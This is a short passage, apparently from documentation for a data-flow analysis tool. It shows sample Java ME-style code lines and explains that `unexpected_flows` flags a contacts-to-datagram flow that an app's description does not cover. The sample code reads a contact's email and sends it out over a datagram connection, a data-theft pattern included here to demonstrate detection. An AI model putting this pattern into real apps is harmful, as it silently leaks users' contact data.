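    "contacts = pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);",
    "items = contacts.items();",
    "contact = items.nextElement();",
    "email = contact.getString(Contact.EMAIL, 0);",
    "buf = email.getBytes();",
    "d = dc.newDatagram(dc.getMaximumLength());",
    "d.setData(buf, 0, buf.length);",
    "dc.send(d);",
    "loc = lp.getLocation(10);",
    "conn = Connector.open(url + loc);",
]
```

For an app whose description only covers sending location to a server, `unexpected_flows(SAMPLE, [("location", "connection-url")])` leaves the contacts-to-datagram flow as the finding to review.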